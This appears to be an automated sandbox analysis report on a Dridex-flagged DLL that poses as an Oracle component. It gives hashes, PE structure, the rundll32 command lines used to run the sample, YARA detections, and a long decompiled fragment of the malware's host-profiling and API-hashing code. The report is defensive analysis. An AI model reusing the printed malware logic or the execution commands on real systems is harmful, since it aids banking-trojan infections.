.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.4.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8F05.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4698
Entropy (8bit):	4.492932697892447
Encrypted:	false
SSDEEP:	48:cvIwSD8zsFJgtWI9ykWSC8BJE8fm8M4JCdsDBhFuQ+q8/QlBok4SrSzd:uITff59SNnpJlbVwkDWzd
MD5:	BDAF83902835F29B48E07E8901C4F239
SHA1:	AEAB76A23475B62A56AE0E84073316D44E8782D3
SHA-256:	14AF2B2990DE08F1201815C802EFF786D2E4E3EC2370EE9E7ADCB582C17153CE
SHA-512:	36E9439F246063C9053DFFBB53003C9CA5ACB04BB0A8D8DD22F6C763BBC5ABA9252E9690254556A177CEAC71BEE6619F70C0E362996C4AC1BE5916925AC10BC4
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1309785" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.282793396653412
Encrypted:	false
SSDEEP:	12288:n28uXUGkhgYmiZ8yAz6uCOITbJoWg66LBCk1AfXctPNpofhyj0:2tXUGkhgYmiZ8ywjqoV
MD5:	048B08AB2E60EBF6535444FB27A0596E
SHA1:	F7C80C5E6C73067E4F5AD19BE009E292C19AF457
SHA-256:	3A72B991C011EC53CC07752A322B600669F0AF60306D0FDDD4D28FC9ACD1030A
SHA-512:	8BDF91428C3A13915A7818741C30BB6C728304AA0D6E4D926AE7E492D56F5A1552AB86523EF4170767DF1A32300BDACD70C2213547D8D76A6EAE9A435DEADDAD
Malicious:	false
Reputation:	low
Preview:	regfW...W...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm*V.z.................................................................................................................................................................................................................................................................................................................................................".'........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.119841628787806
Encrypted:	false
SSDEEP:	384:xas0p53EWxxkVRu3TvYBnP9SaPeSpafYtw+ygihBzpfjUjQOM6Xadt9xf7:xR033Nxk/u3rYB1SaPNpafYtryg6fjyo
MD5:	37F90C73FEDDFB56C864270B8535DF1F
SHA1:	5F3A33F8A8B45073CC5C0C2A9877AB92292F5B7A
SHA-256:	6E14EE2A2EF9A8D590B5FDA5F2AC117F84006FD68FF073366601AA2FA505A0F0
SHA-512:	2D6581FB2595F9AFE0DC29FCA15CE272FBDC1E2D4B0472331311104B6C2F876B5D286377D1D28CEBC87F8A612AA3DD24A36E1FC9122E1AB4F92ACF4F594D2CF6
Malicious:	false
Reputation:	low
Preview:	regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtmV.z.................................................................................................................................................................................................................................................................................................................................................".'HvLE.^......V............K...}..2.L.U..................0......................hbin................p.\..,..........nk,....z.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....z........ ...........8~.............. .......Z.......................Root........lf......Root....nk ....z................................... ..............................DeviceCensus.......................vk..................WritePermissions

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.322741588730022
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll
File size:	544768
MD5:	fa496e911b3de4b5888c894f6eeaabe2
SHA1:	eb857722b13f87d0d9e5596105c4b565fb0e6382
SHA256:	05a16b81c00f57c0bf4ec43f50759006fef117093bc68565c97525374223ff4f
SHA512:	79d7643b375acc7848176e35ab6afff93e903c198cb84e980e2ba0f3e0a87e98c946e70591ab762d4cc5bbc48822a2d6db2a705d4cf2a9f236f3b91ef7cc11f0
SSDEEP:	6144:lT+RYf/Mv1UvT4vjYf/Glpov3KvfMvLo+jwHk3UryzU3+R7ff4evm35IQku4+pMV:lTt2UAogoOwhx7nA4+pMwg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004db0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C2E245 [Wed Dec 22 08:31:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	e980d287af7ef0ccd616c6efb9daaae8

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007F66B4CB9121h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push edi
push ebx
and esp, FFFFFFF8h
sub esp, 00000090h
mov eax, dword ptr [ebp+08h]
mov byte ptr [esp+00000083h], 00000064h
mov dword ptr [esp+70h], 02263442h
mov dword ptr [esp+44h], eax
call 00007F66B4CBCCAAh
mov ecx, eax
mov edx, eax
mov esi, dword ptr [eax+3Ch]
movzx edi, word ptr [esp+0000008Ah]
mov bx, di
mov dword ptr [esp+40h], eax
mov eax, edi
xor eax, 0000E2E7h
mov word ptr [esp+3Eh], ax
mov al, byte ptr [esp+77h]
mov byte ptr [esp+3Dh], al
mov eax, dword ptr [esp+00000084h]
mov dword ptr [esp+38h], esi
mov si, word ptr [esp+3Eh]
mov word ptr [eax+eax+00000000h], si

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7c029	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7c08c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x85000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x6b2e	0x7000	False	0.392543247768	data	4.48735520794	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x7424e	0x75000	False	0.316230969551	data	7.4406996711	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7d000	0x6190	0x5000	False	0.24609375	data	5.03782298504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x2f0	0x1000	False	0.09033203125	data	0.789164600932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x85000	0x152f	0x2000	False	0.2421875	data	4.12390144992	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x84060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
WINSPOOL.DRV	EnumFormsW
ADVAPI32.dll	RegCloseKey, QueryServiceStatusEx, AccessCheck
WS2_32.dll	WSACleanup
USER32.dll	GetWindowTextA
KERNEL32.dll	CloseHandle, GetModuleHandleW, GetFileSize, OutputDebugStringA, IsDebuggerPresent, GetModuleFileNameW

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 4560 Parent PID: 4604

General

Start time:	20:35:07
Start date:	22/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll"
Imagebase:	0x1240000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.650912660.000000006E8E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 1168 Parent PID: 4560

General

Start time:	20:35:08
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1
Imagebase:	0x870000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4040 Parent PID: 1168

General

Start time:	20:35:08
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.26365.dll",#1
Imagebase:	0xc80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.300227503.000000006E8E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.261309993.000000006E8E1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.259186242.000000006E8E1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6204 Parent PID: 4040

General

Start time:	20:35:13
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 700
Imagebase:	0x1a0000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 4560 Parent PID: 4604 loaddll32.exeCOMMON

Executed Functions

Function 6E8F0730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6E8F0730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6e8fd1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6E8F361C(0x30);
					 *0x6e8fd1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6E8F3698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6E8F306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6e8fd1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E8F0FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6e8fd1f8 + 0xb)) = _t162;
					_t363 = E6E8F306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6e8fd1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6E8F0730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6e8fbce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E8EF584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E8EF828(_t429 + 0x24, E6E8EF4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E8EF4BC(_t429 + 0x24, E6E8EF4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6E8F5580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E8EF654(_t429 + 0x20);
							E6E8F55B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6E8F5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E8EDFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E8F55B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6E8F5864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E8EDFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6E8F55B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6E8F5864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E8EDFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E8ECFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6E8F5558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E8ECFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6E8F5558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E8ECFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6E8F5558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E8ECFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6E8F5558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E8ECFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6E8F5558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E8ECFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6E8F5558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e8fd1f8 + 0x24)) = _t189;
							_t190 = E6E8F1030(0xffffffffffffffff);
							_t320 =  *0x6e8fd1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e8fd1f8 + 0x2c)) = E6E8F10A4(0x6e8fd1f8, 0xffffffffffffffff);
								L78:
								if(E6E8F306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6e8fd1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6E8F306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6e8fd1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6E8F35F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6E8F306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6E8F35F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E8EF584(_t429 + 0x18c, _t206);
								_t411 = E6E8F306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E8EF654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E8EF4BC(_t429 + 0x18c, 0);
								_t213 = E6E8EF4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6E8F35F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E8EF4BC(_t429 + 0x18c, 0);
								E6E8EDF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6E8F306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E8EDFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6E8F306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E8EE06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6E8F4FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E8EE8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E8EDFA4(_t429 + 0x1b8);
								E6E8EDFA4(_t429 + 0x1b0);
								E6E8EF654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E8EBB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e8fd1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E8EBB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6E8F35F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6E8F306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6E8F35F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6E8EF584(_t429 + 0x3c, _t262);
						_t265 = E6E8F306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E8EF654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E8EF4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E8EF4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6E8F35F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E8EF4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6E8F306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
